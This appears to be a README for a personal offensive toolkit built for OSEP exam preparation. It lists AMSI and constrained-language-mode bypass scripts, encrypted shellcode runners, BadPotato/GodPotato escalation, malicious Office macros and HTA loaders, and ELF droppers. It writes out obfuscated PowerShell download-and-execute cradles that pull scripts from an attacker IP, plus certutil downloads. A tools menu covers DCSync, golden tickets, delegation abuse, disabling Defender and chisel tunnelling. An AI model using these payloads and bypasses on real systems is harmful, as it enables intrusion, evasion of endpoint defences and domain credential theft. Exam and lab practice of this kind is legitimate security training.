This is just for my osep.
Only tested on Kali-2023.3
sudo apt-get update && sudo apt-get upgrade -y
Install dependencies
python3 -m pip install -r requirements.txt
sudo apt install -y mono-complete
Generate SSL certs for meterpreter
Install arsenal
sudo python3 -m pip install arsenal-cli
Add alias (Kali)
echo PATH=\$PATH:\$HOME/.local/bin >> ~/.zshrc
echo alias a=\'arsenal\' >> ~/.zshrc
Fix arsenal issues on Kali
1. run: sudo vim /etc/sysctl.conf
2. paste: dev.tty.legacy_tiocsti=1
3. Save
4. run: sudo sysctl -p
python3 -i <IP or InterfaceName> -p <meterpreter port> -a <x64 or x86>
python3 -i tun0 -p 443 -a x64
msfconsole -q -r win64-staged-https.rc
Name | Description |
a.ps1 | Bypass AMSI in Powershell |
awsi_buff.ps1 | Bypass AMSI in Powershell & CSharp (Patch ScanBuffer) |
lsal.ps1 | load amsi bypass & shellcode runner (aes, embedded shellcode) |
lsar.ps1 | load amsi bypass & shellcode runner (aes, load shellcode remotely) |
lacxsr.ps1 | load amsi bypass & shellcode runner (caesar & xor, load shellcode remotely) |
clm_rev.ps1 | Bypass clm with Installutil.exe and run amsi bypass & nc_reverse_tcp. Default revserse port 8443. |
clm.ps1 | Download and execute bypass_clm_with_installutil.exe with InstallUtil.exe. bypass_clm_with_installutil.exe will load lacxsr.ps1 |
bypass_clm_cxshell.exe | bypass clm and load lacxsr.ps1 |
bads.ps1 | BadPotato + clm.ps1 |
lbads.ps1 | AMSI bypass(Patch ScanBuffer) + bads.ps1 |
gods.ps1 | GodPotato + clm.ps1 |
lgods.ps1 | AMSI bypass(Patch ScanBuffer) + gods.ps1 |
Useful files
i`e`x(iWr -UsEbaSIcparSING http://IP/lacxsr.ps1);
i`e`x(iWr -UsEbaSIcparSING http://IP/clm_rev.ps1);
i`e`x(iWr -UsEbaSIcparSING http://IP/clm.ps1);
i`e`x(iWr -UsEbaSIcparSING http://IP/lbads.ps1);
Name | Description |
macro_bypass_clm_with_installutil.vb | load clm.ps1 |
shellcode_runner_caesar.vb | shellcode runner |
clm_cert.hta | load bypass_clm_with_installutil.exe using certutil.exe |
clm_ps.hta | load clm.ps1 |
Name | Description |
shellxor.elf | shellcode runner (xor) |
dropper.elf | download and execte shellxor.elf | | download and execte shellxor.elf |
$ ./tools/
0. Download_File
1. chisel
2. Get-DomainTrust
3. Get-DomainSID
4. PowerUpSQL
6. BloodHound
7. GoldenTicket
8. Dump-TrustKey
9. dcsync
10. Unconstrained_Delegation
11. Constrained_Delegation_with_protocol_transition
12. Constrained_Delegation_without_protocol_transition
13. rbcd_Resource_Based_Constrained_Delegation
14. to_parent_domain_using_krbtgt
15. to_parent_domain_using_trustkey
16. cross_forest_with_extraSID
17. schtasks
18. disable_defender
19. sc
$ ./tools/ -c 0
= [Windows] Download_File =
# Default listen ip on tun0, listen port on 80
# certutil.exe
certutil.exe -urlcache -f http://tun0_ip:80/{{filename}} {{filename}}
# PowerShell
iwr "http://tun0_ip:80/{{filename}}" -OutFile "{{filename}}"
powershell i`e`x(iWr -UsEbaSIcparSING http://tun0_ip:80/{{filename}});
python3 tools/ -c BadPotato.ExecuteRectangle -f Invoke-BadPotato -enc thirdparty/BadPotato.exe out/BadPotato.ps1